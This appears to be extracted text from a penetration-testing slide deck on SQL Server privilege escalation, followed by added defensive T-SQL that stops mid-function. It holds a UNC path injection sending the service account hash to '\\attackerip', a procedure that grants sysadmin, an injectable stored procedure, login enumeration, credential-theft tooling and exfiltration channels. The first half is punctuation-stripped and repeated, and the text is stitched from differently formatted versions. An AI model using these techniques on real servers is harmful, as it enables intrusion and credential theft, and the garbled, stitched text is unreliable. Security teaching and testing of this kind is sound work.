Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
(SYSADMIN is often the OWNER)
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues

• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution

Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
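The signed-procedure steps above carried through in T-SQL, as an added example that is not from the presentation or from PowerUpSQL. It replaces the EXECUTE AS OWNER pattern with a certificate login that holds exactly one server permission; the database, procedure, certificate and login names and the file path are assumptions.

```sql
-- Added example (not from the presentation): the signed-procedure pattern,
-- applied to a procedure that needs VIEW SERVER STATE. MyAppDb, MyAppUser,
-- usp_active_sessions, cert_* and the .cer path are assumed names.
USE MyAppDb;
GO

-- Step 1: the procedure that needs more rights than its callers hold.
-- No EXECUTE AS OWNER, so no caller ever runs as the (often sysadmin) owner.
CREATE PROCEDURE dbo.usp_active_sessions
AS
BEGIN
    SET NOCOUNT ON;
    -- sys.dm_exec_sessions requires VIEW SERVER STATE, which MyAppUser lacks.
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END;
GO

-- Step 2: database master key. It protects the certificate's private key and
-- is itself protected by the service master key by default, so ADD SIGNATURE
-- below can open it without a password.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<placeholder: strong DMK password>';
GO

-- Step 3: certificate whose private key stays only in this database.
CREATE CERTIFICATE cert_usp_active_sessions
    WITH SUBJECT = 'Signs dbo.usp_active_sessions';
GO

-- Step 4: the login is created from the certificate's PUBLIC key in master.
-- BACKUP CERTIFICATE without WITH PRIVATE KEY exports only the public part.
BACKUP CERTIFICATE cert_usp_active_sessions
    TO FILE = 'C:\placeholder\cert_usp_active_sessions.cer';
GO
USE master;
GO
CREATE CERTIFICATE cert_usp_active_sessions
    FROM FILE = 'C:\placeholder\cert_usp_active_sessions.cer';
GO
CREATE LOGIN cert_login_usp_active_sessions
    FROM CERTIFICATE cert_usp_active_sessions;
GO

-- Step 5: grant the certificate login exactly one server permission.
GRANT VIEW SERVER STATE TO cert_login_usp_active_sessions;
GO

-- Step 6: sign the procedure with the private key held in MyAppDb.
-- Any later ALTER PROCEDURE drops the signature; re-run this statement then.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.usp_active_sessions
    BY CERTIFICATE cert_usp_active_sessions;
GO

-- Step 7: callers get EXECUTE on the procedure only.
GRANT EXECUTE ON dbo.usp_active_sessions TO MyAppUser;
GO

-- Checks a reviewer can run afterwards:
-- (a) the signature is in place and bound to the expected certificate;
SELECT OBJECT_NAME(cp.major_id) AS signed_object, c.name AS certificate_name
FROM sys.crypt_properties AS cp
JOIN sys.certificates AS c ON c.thumbprint = cp.thumbprint
WHERE cp.class = 1;
-- (b) the database did not need TRUSTWORTHY (expect is_trustworthy_on = 0);
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
-- (c) the certificate login holds only VIEW SERVER STATE besides the default
--     CONNECT SQL that every login receives.
SELECT pe.permission_name, pe.state_desc
FROM sys.server_permissions AS pe
JOIN sys.server_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE pr.name = 'cert_login_usp_active_sessions';
```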
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
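The same procedure rebuilt so that the caller's input can no longer change the statement, as an added example that is not from the presentation; sp_sqli2_fixed and the test values are constructed for illustration.

```sql
-- Added example (not from the presentation): sp_sqli2 without the string
-- concatenation that makes it injectable. Name and test values are constructed.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName nvarchar(128)      -- sysname-sized: a database name is never longer
AS
BEGIN
    SET NOCOUNT ON;

    -- The statement text is a constant. @pattern is a real parameter of the
    -- dynamic batch, so a quote, comment marker or semicolon inside @DbName is
    -- data, never syntax. master..sysdatabases is kept as in the original;
    -- master.sys.databases is the modern view.
    DECLARE @query nvarchar(max) = N'
        SELECT name
        FROM master..sysdatabases
        WHERE name LIKE N''%'' + @pattern + N''%''
           OR name = N''tempdb'';';

    -- Note: % and _ inside @DbName still act as LIKE wildcards (over-matching,
    -- not injection); add an ESCAPE clause if exact substring matching matters.
    EXECUTE sp_executesql
        @query,
        N'@pattern nvarchar(128)',
        @pattern = @DbName;
END;
GO

-- Behaviour check. In the original sp_sqli2 the first value is spliced into
-- the statement text; here it is only compared as a literal, matches no
-- database name, and just tempdb comes back.
EXEC dbo.sp_sqli2_fixed @DbName = N'x'' OR 1=1 --';
EXEC dbo.sp_sqli2_fixed @DbName = N'master';   -- returns master and tempdb
```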
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?

1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them

One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Hosts: LRA, HVA, LVA, ADS, plus the attacker ("Captain Evil", "PURE EVIL"). Ports 80 and 443 (web tier), 1433 and 1434 (SQL Server). Steps: 1. SQL Injection; 2. Execute local command via xp_cmdshell; 3. Access to HVA with shared domain service account, executing commands and gathering data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling SQL Server Links

Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.

Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database links. Same network zones (Internet, DMZ, Intranet), hosts (LRA, HVA, LVA, ADS), ports (80 and 443; 1433 and 1434) and attacker ("Captain Evil", "PURE EVIL") as the previous figure, with DB1 (LVA) added. Steps: 1. SQL Injection; 2. Execute SQL queries and local commands on database servers via nested linked services, first over a DB link with least privileges, then over a DB link configured with the SA account. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226

Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/

Escalating Privileges: Crawling Server Links
Function                  Description
Get-SQLServerLink         Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl    Crawls linked servers and supports SQL query and OS command execution
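A defender-side inventory of the links that a crawl would traverse, as an added example that is not from the presentation or from PowerUpSQL. It reads the catalog views every instance has and flags the two configurations the figure above turns on: links that map every local login to one fixed remote login (such as sa) and links with RPC Out enabled; the finding labels are assumptions.

```sql
-- Added example (not from the presentation): which linked servers exist, how
-- local logins are mapped across them, and whether remote procedure execution
-- is allowed. Runs on the instance being reviewed; finding text is constructed.
SELECT
    s.name                    AS link_name,
    s.data_source             AS remote_instance,
    s.product,
    s.is_rpc_out_enabled,     -- 1: procedures can be executed across the link
    s.is_data_access_enabled, -- 1: OPENQUERY against the link works
    ll.uses_self_credential,  -- 1: the caller's own identity is forwarded
    ll.remote_name,           -- fixed remote login used when uses_self_credential = 0
    CASE
        WHEN ll.local_principal_id = 0 THEN '(all local logins)'
        ELSE sp.name
    END                       AS local_login,
    CASE
        WHEN ll.uses_self_credential = 0 AND ll.remote_name = 'sa'
            THEN 'HIGH: every caller becomes sa on the remote side'
        WHEN ll.uses_self_credential = 0 AND ll.local_principal_id = 0
            THEN 'MEDIUM: every caller shares one fixed remote login'
        WHEN s.is_rpc_out_enabled = 1
            THEN 'MEDIUM: RPC Out allows remote procedure execution'
        ELSE 'review'
    END                       AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
    ON sp.principal_id = ll.local_principal_id   -- NULL for the default mapping row
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
```

Rows with local_login = '(all local logins)' and uses_self_credential = 0 are the ones the public role can ride, since any login on this instance, including low-privileged ones, reaches the remote server as the fixed remote login.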
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'

Partial Solution
• A patch was released for SQL Server versions 2012 through 2016:
  https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008

Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges
OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode            x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:

Approach                                                       Common Tools
Access as Local Administrator                                  Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                          Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                               DBATools
Common Post Exploitation Activities

Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
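The "keyword search plus Luhn check" step from item 2 written in T-SQL, as an added example that is not from the presentation or from PowerUpSQL, so a DBA can classify where card numbers actually live before an attacker does. dbo.fn_luhn_valid, the keyword list and the sample rows are constructed for illustration.

```sql
-- Added example (not from the presentation): Luhn validation of sampled column
-- values, paired with a column-name keyword search. Function name, keywords
-- and sample rows are constructed.
CREATE FUNCTION dbo.fn_luhn_valid (@candidate varchar(64))
RETURNS bit
AS
BEGIN
    -- Keep digits only: stored card numbers are often spaced or dashed.
    DECLARE @digits varchar(64) = '', @i int = 1;
    WHILE @i <= LEN(@candidate)
    BEGIN
        IF SUBSTRING(@candidate, @i, 1) LIKE '[0-9]'
            SET @digits = @digits + SUBSTRING(@candidate, @i, 1);
        SET @i += 1;
    END;
    -- Card PANs are 13 to 19 digits; anything else is not a candidate.
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;

    -- Luhn: from the right, double every second digit, subtract 9 if the
    -- result exceeds 9, and the total must be divisible by 10.
    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
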